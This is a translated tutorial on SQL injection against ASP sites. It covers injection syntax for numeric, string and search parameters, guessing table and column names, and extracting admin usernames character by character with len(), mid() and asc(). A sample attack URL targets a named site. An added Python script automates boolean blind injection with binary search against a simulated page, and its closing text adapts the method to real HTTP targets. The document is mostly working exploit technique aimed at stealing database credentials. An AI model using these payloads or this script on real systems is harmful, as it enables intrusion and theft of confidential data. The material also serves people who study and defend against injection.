ASP Injection Vulnerabilities, Full Contact: Intermediate Chapter

Source: Internet
Author: User
In the introductory chapter we learned how to detect SQL injection, but that alone is far from enough to actually obtain a site's confidential content. Next we continue with how to get what we want out of the database. First, the general steps of a SQL injection:

   Section I, general steps of SQL injection

First, determine the environment, find the injection point and identify the database type; all of this was covered in the introductory chapter.

Second, reconstruct in your head the original SQL statement according to the type of the injected parameter. By parameter type there are three cases:

(A) Injections with a parameter such as id=49 are numeric. The SQL statement is roughly:
Select * from TableName where Field=49
The injected parameter is id=49 and [condition], which produces the statement:
Select * from TableName where Field=49 and [condition]


(B) Injections with a parameter such as class=Series are string type. The original SQL statement is roughly:
Select * from TableName where Field='Series'
The injected parameter is class=Series' and [condition] and ''=', which produces the statement:
Select * from TableName where Field='Series' and [condition] and ''=''

(C) When a search does not filter its parameter, for example keyword=Keyword, the original SQL statement is roughly:
Select * from TableName where Field like '%Keyword%'
The injected parameter is keyword=' and [condition] and '%25'= (%25 is the URL encoding of %, so the server sees '%'=), which produces the statement:
Select * from TableName where Field like '%' and [condition] and '%'='%'

Next, replace [condition] with a SQL statement that guesses a table name, for example:

id=49 and (select count(*) from Admin)>=0

If the page comes back identical to plain id=49, the appended condition holds, i.e. the table admin exists; otherwise it does not (remember this technique). Repeat this until a table name is guessed correctly.

Once the table name is known, replace count(*) with count(FieldName) and guess the field names on the same principle.

Some will say there is an element of luck here: if the table name is complicated and irregular, this no longer works. True, there is no such thing as a 100% successful hacking technique; flies do not bite eggs without cracks. However skilled the hacker, the foothold always comes from someone's program not being written carefully enough, or from users' lack of security awareness.

That was a bit off topic. In other words, for a SQL Server database there are ways to make the program itself tell us the table and field names; we cover those in the advanced chapter that follows this one.


Finally, once the table and field names have been guessed, use SQL statements to obtain the field values. The most common method is described below: ASCII character-by-character decoding. It is slow, but it is guaranteed to work.

For example, we know that table admin has a username field. First take the first record and probe its length:

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

The principle: if the length of the first username (top 1) is greater than 0, the condition holds; then test >1, >2, >3 and so on until the condition fails. For instance, if >7 holds and >8 fails, then len(username)=8.

Of course nobody is so foolish as to test 0, 1, 2, 3 ... one at a time; how to compare faster is up to you. Once the length of the username is known, mid(username,n,1) extracts the nth character and asc(mid(username,n,1)) gives its ASCII code, for example:

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

Again narrow down the ASCII code of the first character step by step. Note that English letters and digits have ASCII codes between 1 and 128, so binary search can be used to speed up the guessing; written as a program, the efficiency improves greatly.
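The two procedures above, guessing a table or field with count(*) and reading a value character by character with len() and asc(mid()), as an added example that is not part of the original article. It simulates the vulnerable showdetail.asp page with an in-memory SQLite database (the Access functions len, mid and asc are emulated as user-defined functions, and Access's "top 1" is spelled "limit 1"), and drives the guessing with a binary search on the "> k" answers instead of probing >0, >1, >2 in turn. The table name admin, the columns and the row contents are constructed sample data.

```python
"""Boolean-based blind SQL injection, run offline against a simulated page.

Added example, not code from the original article. It models the oracle the
article describes (does showdetail.asp?id=49 still render the same record
after a condition is appended?) with an in-memory SQLite database standing in
for the site's Access database, then drives the article's two procedures:
  1. check that a table / column exists with count(*) / count(column), and
  2. recover the first row's value with len() and asc(mid()), using binary
     search on the "> k" answers instead of probing >0, >1, >2, ... in turn.
Table name, column names and row contents are constructed sample data.
"""
import sqlite3


def build_sample_db():
    """Constructed data: stands in for the target's database."""
    con = sqlite3.connect(":memory:")
    # Access-style functions the article uses, emulated as SQLite UDFs.
    con.create_function("len", 1, lambda s: len(s))
    con.create_function("mid", 3, lambda s, n, l: s[n - 1:n - 1 + l])
    con.create_function("asc", 1, lambda s: ord(s[0]))
    con.executescript("""
        CREATE TABLE news  (id INTEGER, title TEXT);
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news  VALUES (49, 'An ordinary news item');
        INSERT INTO admin VALUES (1, 'webadmin', 'Sup3rS3cret');
    """)
    return con


class VulnerablePage:
    """Simulates showdetail.asp: the id parameter is concatenated into the
    query unquoted, exactly the numeric case (A) from the article."""

    def __init__(self, con):
        self.con = con
        self.requests = 0
        self.baseline = self._query("49")

    def _query(self, id_param):
        return self.con.execute(
            "SELECT title FROM news WHERE id=" + id_param).fetchall()

    def same_as_original(self, id_param):
        """The oracle: True when the page looks like plain id=49, False when
        the row vanishes or the query errors (a real site would show an error
        page or an empty page, which is just as distinguishable)."""
        self.requests += 1
        try:
            return self._query(id_param) == self.baseline
        except sqlite3.Error:
            return False


def first_row(expr, table):
    # Access says "SELECT TOP 1 ..."; SQLite spells the same thing "LIMIT 1".
    return f"(SELECT {expr} FROM {table} LIMIT 1)"


def table_exists(page, table):
    return page.same_as_original(f"49 and (SELECT count(*) FROM {table})>=0")


def column_exists(page, table, column):
    return page.same_as_original(
        f"49 and (SELECT count({column}) FROM {table})>=0")


def binary_search(page, expr, lo, hi):
    """Find the integer value of SQL expression `expr` (known to lie in
    lo..hi inclusive) using only yes/no answers to "expr > k"."""
    while lo < hi:
        mid = (lo + hi) // 2
        if page.same_as_original(f"49 and {expr}>{mid}"):
            lo = mid + 1      # value is above mid
        else:
            hi = mid          # value is mid or below
    return lo


def extract_first_value(page, table, column, max_len=256):
    """The article's ASCII character-by-character method, accelerated."""
    length = binary_search(page, first_row(f"len({column})", table), 0, max_len)
    chars = []
    for n in range(1, length + 1):
        code = binary_search(
            page, first_row(f"asc(mid({column},{n},1))", table), 0, 255)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    page = VulnerablePage(build_sample_db())
    for t in ("admin", "users"):
        print(f"table {t!r} exists: {table_exists(page, t)}")
    print("column admin.username exists:", column_exists(page, "admin", "username"))
    user = extract_first_value(page, "admin", "username")
    print(f"first username: {user!r} ({page.requests} requests in total)")
```

Against a real site the oracle is an HTTP request whose response is compared with the untouched id=49 page; compare a stable part of the page rather than the whole body, since timestamps or counters change on every request. Recovering an 8-character value costs 8 requests for the length plus 8 per character with this search, versus up to 128 per character with the linear >0, >1, >2 probing.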

   Section II, common functions in SQL injection

People with a basic command of SQL have a much higher success rate at SQL injection than those unfamiliar with it. We need to raise our SQL level, especially on some common functions and commands.

Access                   SQL Server               Function
asc(character)           unicode(character)       returns the ASCII code (code point) of a character
chr(number)              nchar(number)            the reverse of asc: returns the character for a code
mid(string, N, L)        substring(string, N, L)  returns the substring of length L starting at character N, i.e. characters N through N+L-1
abs(number)              abs(number)              returns the absolute value of a number (used when guessing Chinese characters)
A between B and C        A between B and C        tests whether A lies between B and C

   Section III, handling Chinese characters

It is common to run into Chinese characters during an injection, and some people want to give up as soon as they see them. In fact, with a little understanding of Chinese character encoding, "Chinese phobia" is quickly overcome.

First, some basic facts:

In Access, the code that asc() returns for a Chinese character may be negative. Take the negative value and apply abs() to get its absolute value; the Chinese character is unchanged.

In SQL Server the code of a Chinese character is positive, but because it is a two-byte Unicode character, the function ascii() cannot be used to obtain it; you must use unicode() to return the Unicode value and then nchar() to get back the corresponding Chinese character.

With these two points understood, isn't guessing Chinese much like guessing English? Apart from the care needed in choosing the functions, and guessing over a larger range, the method is no different.
